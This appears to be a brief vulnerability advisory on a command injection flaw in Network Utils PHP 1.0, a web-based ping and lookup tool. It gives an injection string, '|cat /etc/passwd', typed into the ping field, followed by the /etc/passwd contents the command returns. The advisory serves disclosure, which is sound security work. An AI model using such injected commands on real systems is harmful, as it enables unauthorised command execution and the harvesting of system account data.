Brought to you by:
Suppliers of:
Network Utils is a PHP script for basic networking tools such as ping, traceroute, and nslookup. A vulnerability in the PHP code allows remote attackers to execute arbitrary code.
Credit:
The information has been provided by Tacettin Karadeniz .
Vulnerable systems:
* Network Utils PHP version 1.0
Example:
The command which is written to Domain name or IP address part (Ping Utility):
|cat /etc/passwd
With this command, password file to view in the web browser.
Ping Results For : |cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
mysql:x:415:415:MySQL server:/var/lib/mysql:/bin/bash
cilek:x:501:501:cilek:/home/cilek:/bin/bash
avicenna:x:502:502:Avicenna:/home/avicenna:/bin/bash
Please enable JavaScript to view the comments powered by Disqus.
blog comments powered by